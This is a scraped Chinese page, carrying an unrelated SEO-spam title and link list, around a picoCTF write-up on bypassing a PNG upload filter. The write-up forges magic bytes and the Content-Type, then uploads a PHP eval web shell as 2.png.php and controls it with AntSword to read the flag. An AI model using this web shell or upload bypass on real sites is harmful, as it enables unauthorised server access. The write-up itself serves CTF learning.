当前位置: 首页 > news >正文

通辽做网站通过seo来赚钱商品网站建设设计思路

news 2025/10/6 4:15:08
通辽做网站通过seo来赚钱,商品网站建设设计思路,网络营销的特点不包括以下,扬中网站建设服务Description I found a web app that can help process images: PNG images only! 这应该是个上传漏洞了#xff0c;十几年没用过了#xff0c;不知道思路是不是一样的#xff0c;以前的思路是通过上传漏洞想办法上传一个木马#xff0c;拿到webshell#xff0c;今天试试看… Description I found a web app that can help process images: PNG images only! 这应该是个上传漏洞了十几年没用过了不知道思路是不是一样的以前的思路是通过上传漏洞想办法上传一个木马拿到webshell今天试试看能不能成功。 随便翻一翻源码没有找到什么有用的信息只找到一个robots.txt这还是最近才学到的给Google提供的map文件 robots.txt发现如下信息 User-agent: * Disallow: /instructions.txt Disallow: /uploads/有一个/uploads/文件夹这里应该就是文件上传后的地址了 /instructions.txt文件信息如下大意是提交时验证.png 扩展名然后还要验证文件字节的正确性 Lets create a web app for PNG Images processing. It needs to: Allow users to upload PNG images look for .png extension in the submitted files make sure the magic bytes match (not sure what this is exactly but wikipedia says that the first few bytes contain PNG in hexadecimal: 50 4E 47 ) after validation, store the uploaded files so that the admin can retrieve them later and do the necessary processing.那我i们就试一试上传一个非png文件提示需要.png后缀把非png文件后缀改为.png发现后端也有有文件头验证可能这就是/instructions.txt 所说 随便制作一个png图片直接截图保存越小越好便于我们查看修改文件信息上传png图片 使用Burpsuite抓包查看请求信息Content-Type: image/png 这应该就是后端的验证关键了吧 修改png文件信息加上PHP一句话木马修改一下filename后缀加上.php这里后缀的验证是前端js做的用Burpsuite发送请求就不必考虑后缀的验证问题了 如图返回上传成功 ?php eval($_POST[hucker]);?接下来我们使用中国蚁剑连接木马地址以前用菜刀管理webshell爬取网站文件信息挺好用的百度找到一个中国蚁剑就决定试试看介绍好像也是根据菜刀改的。这种黑客软件最好是去github下载原版可以验证MD5毕竟是开源的东西一般不会存在后门。 连接我们的木马前面我们通过robots.txt看到文件上传目录是uploads组合一下得到地址[http://atlas.picoctf.net:49226/uploads/2.png.php]输入密码hucker 连接 直接查看网站文件找到一个GAZWIMLEGU2DQ.txt 里面就是flag了
http://www.sczhlp.com/news/164777/

相关文章:

  • 小网站搜什么关键词深圳网站建设 贝尔利
  • 到哪里做网站墙内千兆网站怎么做
  • 一起做单网站怎么样甘肃制作网站
  • 建站工具搭建前台网站php网站开发教程
  • 商品网站开发需求表网站文件下载系统
  • 南宁网站排名外包wordpress写模版
  • 辽宁住房和建设厅网站雄安专业网站建设哪家好
  • javaScript的构造函数和java的构造函数区别
  • VulnHub-Raven2 靶场 wp
  • 免费的素材网站有哪些wordpress 官方主题
  • 同城类网站建设多少钱北京营销型网站定制
  • 东莞设计制作网站制作wordpress二维码制作教程
  • 品牌网站设计图片网站的建设目标有哪些
  • 广州seo公司排名临沂网站建设优化
  • 海珠高端网站建设手机兼职快递录单员
  • 建设网站 可以用3层架构吗给企业做网站的业务员
  • 受欢迎的免费网站建设wordpress主页音乐
  • 网站开发之美如何看一个网站是谁做的
  • 触摸屏网站建设wordpress 4.4.15
  • 企业网站设计图片网页qq邮箱怎么发文件
  • 山东专业网站建设哪家便宜做自己照片视频网站
  • 推荐坪山网站建设淘宝网络营销方案
  • 甘肃做网站的公司有哪些多语种网站后台
  • 泉州做网站的企业做织梦网站的心得体会
  • 山西运城市建设局网站河南省建设厅建筑信息网官网
  • 怎样学网络推广佛山网站运营十年乐云seo
  • 梅林 做服务器 网站深圳 电子商务网站开发
  • 做单页网站需要做什么wordpress导出工具栏
  • 太原网站建设名录搜索热词排行榜
  • linux网站开发软件公司网站建设需求书